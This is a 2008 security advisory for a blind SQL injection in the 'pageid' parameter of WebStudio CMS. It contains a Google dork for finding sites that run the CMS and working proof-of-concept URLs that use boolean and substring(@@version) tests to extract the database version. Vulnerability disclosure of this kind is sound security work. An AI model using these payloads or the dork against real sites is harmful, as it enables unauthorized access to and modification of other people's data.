Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20922
HistoryNov 25, 2008 - 12:00 a.m.

WebStudio CMS 'pageid' Blind SQL Injection

2008-11-2500:00:00
vulners.com
83

Application: WebStudio CMS

Vendor Name: BDigital Media Ltd

Vendors Url: http://www.bdigital.biz

Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability

Exploitation: Remote

Severity: Critical

Solution Status: Unpatched

Introduction: WebStudio CMS is a modular Web Content Management System solution.

Google Dork: "Powered by WebStudio"

Description:

WebStudio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify
data, or exploit latent vulnerabilities in the underlying database.

PoC:

http://localhost/index.php?pageid=1+and+1=1 ( TRUE )

http://localhost/index.php?pageid=1+and+1=2 ( FALSE )

Exploit:

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )

Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.

Credits:

Charalambous Glafkos
Email: glafkos (at) astalavista (dot) com


ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net